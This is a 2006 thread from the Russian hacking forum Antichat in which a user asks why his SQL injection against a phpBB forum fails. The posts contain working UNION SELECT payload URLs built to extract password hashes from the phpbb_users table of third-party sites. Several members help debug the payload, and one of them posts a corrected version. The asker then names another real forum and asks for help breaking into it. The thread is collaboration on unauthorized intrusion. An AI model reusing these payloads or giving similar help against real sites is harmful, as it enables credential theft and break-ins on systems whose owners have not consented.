Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос насчет sql injection. (https://forum.antichat.xyz/showthread.php?t=17506)

Lord Nikon 11.04.2006 16:16

Вопрос насчет sql injection.
 
Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности).
Вот код
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18.
Спасибо за помощь.Не ругайтесь пожалуйста.=)

Nemesis 12.04.2006 21:03

А кто сказал что префикс phpbb? и вообще, запрос может быть вполне неверен...

Lord Nikon 12.04.2006 21:20

ну извини я сначало видео посмотрел а потом поробовал.

Lord Nikon 12.04.2006 23:44

Народ в чем же ошибка?

max_pain89 12.04.2006 23:47

может профиксили? попробуй просто -99+or+1=1 че будет

+toxa+ 13.04.2006 00:04

У меня так всё работает...
Код:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....

Lord Nikon 13.04.2006 03:57

Цитата:

Сообщение от max_pain89
может профиксили? попробуй просто -99+or+1=1 че будет

он меня так же выкидывает на index.php.Ничего не происходит.
Цитата:

Сообщение от +toxa+
У меня так всё работает...
Код:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=[тут id]/*
ЗЫ чё-то как-то пробелы сами добавляются....

ты имеешь ввиду у тя таким образом все получается?

Desr0w 13.04.2006 04:12

Цитата:

Сообщение от +toxa+
У меня так всё работает...
Цитата:

ты имеешь ввиду у тя таким образом все получается?
Судя по ответу работает-соответственно получается:)

SanyaX 13.04.2006 08:10

Мемберы античата не все разбираються в sql.

Lord Nikon 13.04.2006 16:10

успокойся,если не хочешь чтоб я был в мемберах так и скажи =)

Насчет вопроса - получается что профиксили?

k1b0rg 13.04.2006 16:12

пофиксили

Lord Nikon 13.04.2006 17:56

тогда вот форум который мне интересен
http://www.wow.wnet.ua/new_forum/
посомтрите если не трудно,я почти все о нем узнал,но ни какие уязвимости не проходят,помогите.
Пожалуйста.

SanyaX 13.04.2006 18:39

Да я против тебя не чегон е имею просто ыт так гвооришь как будто дибил какой то. Вот и отвечаю что не все мемберы знают что воще это такое.

Lord Nikon 13.04.2006 20:12

за словами следи.
Если помогать не собираешься,зачем флудить?

1ten0.0net1 13.04.2006 20:24

2 Lord Nikon - если ты используешь именно тот запрос, который запостил здесь то служебное слово FROM записано неверно - убери в нем пробел.

syntacsis 19.04.2006 18:06

Lord Nikon, префикс совсем не обязательно phpbb_. Хотя этот префикс в пхпбб по умолчанию. Ещё например phpbb2_ часто бывает. Хотя толковый админ ни тот не другой не поставит. Кто хорошо разбирается в пхпбб, следит за безопасностью, прекрасно знает об sql inj. Только мягко говоря неопытные админы оставят этот префикс. По крайней мере все сайты поддержки пхпбб и наши и забугорные давным давно всем втолковывают - меняйте префиксы. Тем более что делается это элементарно одним запросом. Это так сказать основа безопасности. Удивляюсь, что у кого-то старые префиксы остаются. Совсем лохи наверно. :rolleyes: У них наверно и других уязвимостей полно.


Время: 04:32